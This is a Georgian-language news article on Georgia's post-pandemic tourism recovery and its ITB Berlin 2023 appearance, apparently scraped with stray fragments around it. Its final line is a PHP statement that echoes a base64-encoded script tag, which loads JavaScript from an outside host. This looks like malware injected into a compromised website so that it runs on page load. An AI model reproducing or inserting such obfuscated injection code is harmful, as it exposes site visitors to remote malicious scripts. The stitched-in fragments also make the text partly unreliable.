celsiusi
ავერსი საქკაბელი

მთავრობის ინფორმაციით, საქართველოში ტურიზმის აღდგენის დინამიკა საკმაოდ სწრაფი ტემპებით ხასიათდება. პარლამენტისთვის წარდგენილ წლიურ ანგარიშში მთავრობა აღნიშნავს, რომ 2022 წლის მონაცემებით, საერთაშორისო მოგზაურების ვიზიტების რაოდენობამ 5 426 903 შეადგინა, რაც 2019 წლის მონაცემის 58%-ით აღდგენის მაჩვენებელია.

„საერთაშორისო ტურისტების რაოდენობამ 3 652 949 შეადგინა, რაც 2019 წლის მონაცემების 71.9%-ით აღდგენის მაჩვენებელი და, 2021 წელთან შედარებით, +131.6%-იანი ზრდის მაჩვენებელია. აღდგენის დინამიკა სტაბილურობას განაგრძობს. 2023 წლის პირველი კვარტალის მონაცემებით, საერთაშორისო მოგზაურების მიერ განხორციელებული ვიზიტების რაოდენობა 1 208 462-ით განისაზღვრა, რაც 2019 წლის მონაცემების 74.7%-ით აღდგენის მაჩვენებელია. ტურისტული ვიზიტების შემთხვევაში კი, აღნიშნული აღდგენის მაჩვენებელი 95%-ს აჭარბებს (845 332 ტურისტული ვიზიტი)“, – აღნიშნავს მთავრობა.

მთავრობის ცნობით, 2023 წელს, პირველად ქვეყნის ისტორიაში, საქართველო მასპინძელი ქვეყნის სტატუსით ღირსეულად წარსდგა ყველაზე მასშტაბურ და გავლენიან ტურისტულ გამოფენაზე − ITB Berlin 2023, რაც უდიდეს შესაძლებლობას წარმოადგენდა მთელ მსოფლიოში ქვეყნის ტურისტული მიმართულების წარდგენისა და ტურისტული პროდუქტების გაცნობის.

აღსანიშნავია, რომ გამოფენა სამწლიანი პაუზის შემდეგ პირველად ჩატარდა LIVE ფორმატში, რომელშიც მონაწილეობა მიიღო 5 500-მა მონაწილემ 160-ზე მეტი ქვეყნიდან. 

530
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");